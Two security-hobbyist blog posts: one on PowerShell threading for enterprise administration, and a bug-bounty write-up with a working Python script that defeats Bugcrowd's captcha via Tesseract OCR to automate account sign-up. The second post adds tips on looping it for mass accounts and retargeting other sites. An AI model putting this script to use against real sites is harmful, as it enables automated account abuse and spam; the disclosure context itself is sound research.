Friday, 20 December 2013

PowerShell: Threading

Having recently got my head around basic PowerShell, I wanted to share some of the lessons I'd learnt. In this first post I'll talk about PowerShell threading and performing tasks on an enterprise scale.


Getting Started

I'm not going to cover how to install and set up PowerShell/WinRM. There are a lot of good posts out there already, for example:

http://blog.powershell.no/2010/03/04/enable-and-configure-windows-powershell-remoting-using-group-policy/

In a nutshell, you need to create a GPO to enable the WinRM service or, if you want to test locally, just start the WinRM (Windows Remote Management) service. To run commands you'll need to have PowerShell installed (PowerShell 2.0 is included with Windows 7 by default); I'd recommend updating to PowerShell 3.


Scaling up your PowerShell

When running a script across thousands of machines I found three factors significantly affected the total run time: how well I could get the tasks to run in parallel, the efficiency of my code, and how much work I could offload to remote machines.

Efficiently running tasks in parallel was the biggest issue, so in this post I'll cover the main parallel/off-loading techniques:
  • Invoke-Command
  • Jobs
  • Runspace Pooling
But first I wanted to briefly mention efficient coding.


Creating efficient scripts

In every language efficient coding can significantly affect the speed of and resources used by your scripts. This is particularly important when trying to scale a script across many machines as any inefficiencies are magnified.

I found the following helped improve my PowerShell code performance:
  • Using PowerShell built-in functions (cmdlets) wherever possible
  • Using piping as much as possible
  • Minimizing creation/usage of new variables/files/objects
  • Avoiding searching or iterating over large data sets
  • Performing operations in parallel
For example, to count the lines in a 2MB text file that match a given string, you don't want to do something crazy like this:

$i=0;Get-Content c:\temp\test.txt|ForEach {if($_ -eq 123){$i++}};Write-host $i

During testing the above took 8 seconds. The following code is cleaner but still took 7 seconds:

(Get-Content c:\temp\test.txt |Where {$_ -match "123"}| Measure-Object -Line).Lines

In this instance, the fastest way to search is by using Select-String, which in testing took less than a second! Using a single cmdlet and its built-in parameters made this the most efficient option.

@(Select-String -Path c:\temp\test.txt -pattern 123).count

So how can we execute this in parallel across thousands of machines?


Invoke-Command

Invoke-Command offers a simple way to execute commands on multiple remote machines in parallel.

http://technet.microsoft.com/en-us/library/hh849719.aspx

The SANS blog and Technet links below give some great explanations about why it's useful:

http://computer-forensics.sans.org/blog/2013/09/03/the-power-of-powershell-remoting

http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/23/an-introduction-to-powershell-remoting-part-one.aspx

I found Invoke-Command an OK option for simple one-off commands but unsuitable for more complex interactive scripts. By design you provide code to be executed on the remote machine and, once it completes, you are given the result. I couldn't find a way to perform interactive actions or easily get/push data (see the double-hop problem). I also couldn't find a clean way to handle errors for inaccessible/offline machines (suggestions are welcome!).

As an example here's a script to check the status of a service on multiple machines:

Invoke-Command -ComputerName (Get-Content "C:\Temp\computers.txt") -ScriptBlock {Get-Service -Name WPCSvc} -ThrottleLimit 50 -ErrorAction Continue

Unsatisfied with Invoke-Command I decided to look for alternative techniques.


PowerShell Jobs

When you Google PowerShell and threading, everyone tells you to use Jobs as they are PowerShell's answer to threads. So that's what I did. Using the script at the link below, I implemented a job creation function and a job management function, and set my script going.

http://webcache.googleusercontent.com/search?q=cache:yFjkpkw8lT4J:www.get-blog.com/%3Fp%3D22

Something like this:

$MaxThreads = 20
$SleepTimer = 1000
$Computers = Get-Content "C:\Temp\computers.txt"

ForEach ($Computer in $Computers){
    While (@(Get-Job -state running).count -ge $MaxThreads){
        Start-Sleep -Milliseconds $SleepTimer
    }

    Start-Job -scriptblock {
        if(Test-Path \\$($args[0])\C$ -ErrorAction silentlycontinue){
            #Do something
        } else{
            "Machine not accessible"
        }
    } -ArgumentList $Computer -Name "$($Computer)job" | Out-Null
}

While (@(Get-Job -State Running).count -gt 0){
    Start-Sleep -Milliseconds $SleepTimer
}

ForEach($Job in Get-Job){
    Receive-Job -Job $Job
    Remove-job -Force $Job
}

The positive with this script is that, instead of Invoke-Command, you can use cmdlets that take -ComputerName (such as Get-WmiObject) to run commands against remote machines interactively and in parallel. The negative is that it took a very long time to run. I'm not sure whether PowerShell has a cap on the number of concurrent jobs or whether jobs are just inefficient. Either way, jobs were slow. So I went back to Google.


Runspace pooling to the rescue!

After wading through all of the Jobs posts I finally got to a technique called runspace pooling. By calling CreateRunspacePool it is possible to create a pool of runspaces, each of which effectively works as a thread.

http://msdn.microsoft.com/en-us/library/system.management.automation.runspaces.runspacefactory.createrunspacepool(v=vs.85).aspx

With one runspace per host and many runspaces running simultaneously the script was very fast. It's possible to include your own runspace code within your script, but I found the simpler solution was to use Tome Tanasovski's threading function. I'd recommend checking out his post here for the full story and script:

http://powertoe.wordpress.com/2012/05/03/foreach-parallel/

Using Tome's runspace pooling code I found it easy to create scripts that ran quickly, didn't encounter double-hop problems and handled errors as expected.


Putting PowerShell Threading to Work

To give a quick example, I created the script below that checks the status of a service and, if it's stopped, sets it to start automatically and starts it:

$computer = "testhost"
$myservice = Get-Service -computerName $computer -Name "WPCSvc"| Where-Object {$_.status -eq "Stopped"}
if($myservice){
 "Service is stopped. Starting now!"
 Set-Service WPCSvc -startuptype "Automatic" -computerName $computer 
 Start-Service -inputobject $myservice
 "Service started!"
}

I've used the Get-Service cmdlet to first get the status of a specific service. If the service is stopped, the script sets the startup type to automatic and starts the service.

So that's for one machine. If we want to run this on thousands of machines we just need to combine the code with Tome's runspace script:

function ForEach-Parallel {
    param(
        [Parameter(Mandatory=$true,position=0)]
        [System.Management.Automation.ScriptBlock] $ScriptBlock,
        [Parameter(Mandatory=$true,ValueFromPipeline=$true)]
        [PSObject]$InputObject,
        [Parameter(Mandatory=$false)]
        [int]$MaxThreads=5
    )
    BEGIN {
        $iss = [system.management.automation.runspaces.initialsessionstate]::CreateDefault()
        $pool = [Runspacefactory]::CreateRunspacePool(1, $maxthreads, $iss, $host)
        $pool.open()
        $threads = @()
        $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param(`$_)`r`n" + $Scriptblock.ToString())
    }
    PROCESS {
        $powershell = [powershell]::Create().addscript($scriptblock).addargument($InputObject)
        $powershell.runspacepool=$pool
        $threads+= @{
            instance = $powershell
            handle = $powershell.begininvoke()
        }
    }
    END {
        $notdone = $true
        while ($notdone) {
            $notdone = $false
            for ($i=0; $i -lt $threads.count; $i++) {
                $thread = $threads[$i]
                if ($thread) {
                    if ($thread.handle.iscompleted) {
                        $thread.instance.endinvoke($thread.handle)
                        $thread.instance.dispose()
                        $threads[$i] = $null
                    }
                    else {
                        $notdone = $true
                    }
                }
            }
        }
    }
}

$ErrorActionPreference = "Stop";

$ComputerList = $(Read-Host "Enter the Location of the computerlist")
$Computers = Get-Content $ComputerList
$Computers | ForEach-Parallel -MaxThreads 100 {
 try{
  if(Test-Path \\$_\C$ -ErrorAction silentlycontinue){
   $test = Get-Service -computerName $_ -Name "WPCSvc"| Where-Object {$_.status -eq "Stopped"}
   if($test){
    "Service stopped on: " + $_
    Set-Service WPCSvc -startuptype "Automatic" -computerName $_ 
    Start-Service -inputobject $test
    "Service started on: " + $_
   }
  } else{
   $_ + " - Machine not accessible"
  }
 }
 Catch{
   "Caught an exception!"
 }
}

At first glance it might seem confusing but it's dead simple. The whole first section is Tome's script and handles the threading. My code starts by reading in a list of computers from a text file. Then we pipe those machines to Tome's function, ForEach-Parallel. The script block that follows contains the code that will execute in each runspace.

I've used the same Get-Service, Set-Service and Start-Service cmdlets as in my first example. This time round, though, I added a check to see if the machine was accessible using Test-Path, and error handling with a try/catch.


Final Thoughts

Threading is one of the most important features of any language and I was surprised how poorly it was implemented in PowerShell. Being new to PowerShell definitely didn't help, but the information online was also pretty poor: no one really covered all of the techniques in one place or explained which was better.

Personally I found runspace pooling the fastest, cleanest and easiest to use. Although Tome's script is a little bulky, it makes threading simple. I would love to hear other people's opinions on what worked best for them.

I'll hopefully be adding some more PowerShell blog posts in the future. For more security-orientated PowerShell, definitely check out PoshSec and Posh-SecMod.

Pwndizzle out.

Thursday, 5 December 2013

Breaking Bugcrowd's Captcha with Python and Tesseract

In this post I'm going to talk about bypassing Bugcrowd's captcha using Python and Tesseract. This post was originally written for the Bugcrowd blog here: http://blog.bugcrowd.com/guest-blog-breaking-bugcrowds-captcha-pwndizzle/


A Bugcrowd Bounty

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic captcha. In certain sections of the site, for example account sign up, password reset and on multiple failed passwords, you were required to enter the captcha to verify you were human:

This in theory would prevent the automated use of these functions. But if I could find a way to bypass the captcha I could potentially abuse these functions.


So how do you bypass a captcha? 

If it's a home-grown captcha you may be lucky enough to find a logic flaw, such as the captcha code being included on the current page, or perhaps you can re-use a valid captcha more than once.

If you're dealing with a more sophisticated captcha you've got two options. Either you outsource the work to a developing country (http://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/) or you can try optical character recognition (OCR).  


OCR?

Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and have it return you a list of characters. I found Tesseract (https://code.google.com/p/tesseract-ocr/) to be a good choice as its engine has been pre-trained and it worked out of the box with decent results.

As the Bugcrowd captcha was so simple, all I needed to do to get Tesseract to succeed most of the time was enlarge the image before submitting it for analysis. For other, more complex captchas that use distorted characters or overlays to mask the text, you will need to clean the image before submitting it to Tesseract. Some examples can be found in the references below.
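
To give a rough idea of what "cleaning" can mean, here is a minimal sketch of thresholding, one common pre-processing step. It is an illustration only: the Bugcrowd captcha didn't need it, and the function name, threshold and sample pixel values are all made up for the example. The image is represented as plain rows of greyscale values so the snippet runs without any imaging library.

```python
# Hypothetical pre-processing step: the Bugcrowd captcha only needed enlarging,
# so this thresholding pass is an illustration, not part of the original script.

def binarize(pixels, threshold=128):
    """Turn a greyscale image (rows of 0-255 values) into pure black and white.

    Pixels darker than the threshold become 0 (text) and the rest become 255
    (background), which removes faint noise and gradients.
    """
    return [[0 if value < threshold else 255 for value in row] for row in pixels]


# A tiny 3x4 "image": dark text pixels (20-60) on a noisy light background.
sample = [
    [250, 30, 240, 200],
    [245, 20, 180, 235],
    [230, 60, 225, 190],
]

cleaned = binarize(sample)
for row in cleaned:
    print(row)
```

With PIL the same idea would probably be a convert("L") followed by a point() call with a similar lambda, but I haven't tested that against a real captcha, so treat it as a starting point.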


Weaponizing using Python

With a way to obtain the captcha value from the captcha image I decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy I am, I had a look on Google to see if someone else had already created a similar script and although there were captcha breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests: one to retrieve the sign-up page (containing the captcha and CSRF token) and a second to send the sign-up data (username, email, password etc.). To automate the whole process the script would need to download a copy of the sign-up page, extract the CSRF and captcha tokens, download and analyse the captcha, then submit a sign-up request containing the account details, the CSRF token, the captcha token and the captcha value.


Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha
# Created by @pwndizzle - http://pwndizzle.blogspot.com 

from PIL import Image
from urllib.error import URLError
from urllib.request import Request, urlopen, urlretrieve
from urllib.parse import urlencode
import re
import subprocess

def getpage():
    try:
        print("[+] Downloading Page")
        site = urlopen("https://portal.bugcrowd.com/user/sign_up")
        site_html = site.read().decode("utf-8")
        global csrf
        # Parse page for CSRF token (string 43 characters long ending with =)
        csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)
        print("-----CSRF Token: " + csrf[0])
        global ctoken
        # Parse page for captcha token (string 40 characters long)
        ctoken = re.findall('[a-z0-9]{40}', site_html)
        print("-----Captcha Token: " + ctoken[0])
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")


def getcaptcha():
    try:
        print("[+] Downloading Captcha")
        captchaurl = "https://portal.bugcrowd.com/simple_captcha?code=" + ctoken[0]
        urlretrieve(captchaurl, 'captcha1.png')
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")


def resizer():
    print("[+] Resizing...")
    im1 = Image.open("captcha1.png")
    width, height = im1.size
    # Enlarge the captcha five times in each dimension before OCR
    im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)
    im2.save("captcha2.png")

 
def tesseract():
    try:
        print("[+] Running Tesseract...")
        # Run Tesseract; -psm 8 tells Tesseract we are looking for a single word
        subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
        global cvalue
        # Read Tesseract's output file (raw string so the backslashes stay literal)
        with open(r"C:\Python33\output.txt", "r") as f:
            # Remove spaces and keep only the first line of the output
            cvaluelines = f.read().replace(" ", "").split('\n')
        cvalue = cvaluelines[0]
        print("-----Captcha: " + cvalue)
    except Exception as e:
        print("Error: " + str(e))

  
def send():
    try:
        print("[+] Sending request...")
        user = "testuser99"
        # urlencode() percent-encodes the values itself, so pass the raw check
        # mark rather than an already-encoded '%E2%9C%93' (which would be encoded twice)
        params = {'utf8': '\u2713', 'authenticity_token': csrf[0],
                  'user[username]': user, 'user[email]': user + '@test.com',
                  'user[password]': 'password123',
                  'user[password_confirmation]': 'password123',
                  'captcha': cvalue, 'captcha_key': ctoken[0],
                  'agree_terms_conditions': 'true'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://portal.bugcrowd.com/user")
        # Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        # Check for error message
        fail = re.search('The following errors occurred', response)
        if fail:
            print("-----Account creation failed!")
        else:
            print("-----Account created!")
    except Exception as e:
        print("Error: " + str(e))

  
print("[+] Start!")
# Download page and parse data
getpage()
# Download captcha image
getcaptcha()
# Resize captcha image
resizer()
# Need more filtering? Add subroutines here!
# Use Tesseract to analyse captcha image
tesseract()
# Send request to site containing form data and captcha
send()
print("[+] Finished!")
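
If you want to play with the token parsing from getpage() without hitting the site, something like the sketch below should do. The two regular expressions are the ones used in the script; everything else (the extract_tokens name, the sample tokens and the page fragment) is made up for illustration and is not the real Bugcrowd markup.

```python
import re

# Made-up tokens with the same shape as the ones the script looks for.
SAMPLE_CSRF = "Ab3+" * 10 + "xY9" + "="              # 43 base64 characters, then "="
SAMPLE_CTOKEN = "0123456789abcdef" * 2 + "01234567"  # 40 lowercase characters

# Hypothetical page fragment; the real sign-up page is not reproduced here.
SAMPLE_HTML = """
<meta content="{csrf}" name="csrf-token" />
<img src="/simple_captcha?code={ctoken}" />
""".format(csrf=SAMPLE_CSRF, ctoken=SAMPLE_CTOKEN)


def extract_tokens(html):
    """Return (csrf, captcha_token), or raise ValueError if either is missing."""
    csrf = re.search(r"[a-zA-Z0-9+/]{43}=", html)
    ctoken = re.search(r"[a-z0-9]{40}", html)
    if csrf is None or ctoken is None:
        raise ValueError("could not find both tokens in the page")
    return csrf.group(0), ctoken.group(0)


csrf, ctoken = extract_tokens(SAMPLE_HTML)
print("CSRF token:   ", csrf)
print("Captcha token:", ctoken)
```

Raising an error when a token is missing is a design choice of this sketch: it stops a failed download from silently carrying on to the next step.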


Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following captcha:

I get the following output:


Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking "if it's that easy to bypass a captcha why isn't everyone doing it?". Well there are some important points to remember:

  • Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.
  • Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha means a lower success rate, more requests and a greater chance of getting caught/locked out.
  • There could be server-side mitigations in place we don't know about, e.g. each IP cannot create more than five accounts a day.
  • The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.
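
To put some rough numbers on the first point, and to show what "make the username/email dynamic" might look like, here is a small sketch. The function names are hypothetical, the form data is trimmed to the fields that change, and the maths assumes every attempt is independent with the same 30% chance of success, which is a simplification.

```python
def signup_params(index, csrf, ctoken, cvalue):
    """Build form data for the Nth account, varying only username and email."""
    user = "testuser{}".format(index)
    return {
        "authenticity_token": csrf,
        "user[username]": user,
        "user[email]": user + "@test.com",
        "captcha": cvalue,
        "captcha_key": ctoken,
    }


def expected_attempts(success_rate):
    """Average number of tries per solved captcha (mean of a geometric distribution)."""
    return 1 / success_rate


def chance_within(tries, success_rate):
    """Probability that at least one of `tries` independent attempts succeeds."""
    return 1 - (1 - success_rate) ** tries


for i in range(3):
    # Placeholder tokens: a real run would fetch fresh ones for every attempt.
    print(signup_params(i, "csrf", "ctoken", "guess")["user[email]"])

print(round(expected_attempts(0.3), 2))   # 3.33 attempts per account on average
print(round(chance_within(5, 0.3), 3))    # 0.832 chance of success within 5 tries
```

So at a 30% success rate you'd expect a little over three requests per account, which is exactly the kind of extra traffic that rate limiting or lockouts would pick up.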


Final Thoughts

I like the concept of captchas: current machines struggle with optical recognition and an image check is all it takes to prevent automation. As demonstrated, though, simple letter/number captchas can be easy to break and everyday use can frustrate users. For me, images of people/objects/scenes, like the friend captcha used by Facebook, or interactive captchas/mini-games like those offered by http://areyouahuman.com/ appear to be interesting alternatives that offer effective anti-automation (for now) with improved user experience.

If you want to re-use the script it should work fine on other machines and sites, but you'll need to change the URLs, the parsing logic and possibly apply image filters depending on the captcha you're targeting. I built the script using Python 3.3 and Tesseract 3.02 with default installation locations on Windows 7.

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

http://blog.c22.cc/2010/10/12/python-ocr-or-how-to-break-captchas/

http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html

http://bokobok.fr/bypassing-a-captcha-with-python/

Also, cleaning captchas with ImageMagick looked interesting but I didn't get round to testing it:

http://www.imagemagick.org

Thanks to Bugcrowd for all their awesome work. I hope you guys have found this post useful. Questions and feedback are always appreciated so drop me a comment below :)

Pwndizzle out.